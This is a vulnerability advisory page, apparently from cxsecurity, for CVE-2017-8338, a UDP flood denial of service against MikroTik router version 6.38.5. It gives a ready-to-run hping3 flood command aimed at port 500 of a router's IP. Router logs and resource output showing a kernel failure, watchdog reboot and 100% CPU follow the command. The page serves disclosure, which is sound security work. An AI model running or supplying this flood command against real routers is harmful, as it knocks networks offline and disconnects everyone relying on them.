MikroTik UDP Flood Denial of Service

Published
Credit
Risk
2017.05.10
Hosein Askari
Medium
CWE
CVE
Local
Remote
CWE-400
CVE-2017-8338
No
Yes

################
#Exploit Title: MikroTik UDP Flood Denial of Service | kernel failure
#Reference: https://www.vulnerability-lab.com/get_content.php?id=2064
#CVE: CVE-2017-8338
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : V-6.38.5
#Exploit Tested on: Parrot Security OS
#Date: 09-05-2017
#Category: Network Appliance
#Author Mail : hosein.askari@aol.com
#Description: A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically.
###############
Proof of Concept (PoC):
The denial of service vulnerability can be exploited by remote attackers without user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
hping3 --udp -p 6000 --destport 500 --flood [router's IP]
#########################
#Log:
apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot
apr/27/2017 04:37:47 system,error,critical out of memory condition was detected
apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer
########################
#The sample of "CPU Usage" :
[admin@MikroTik] > system resource monitor
cpu-used: 100%
cpu-used-per-cpu: 100%
free-memory: 2487KiB

References:

https://www.vulnerability-lab.com/get_content.php?id=2064


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com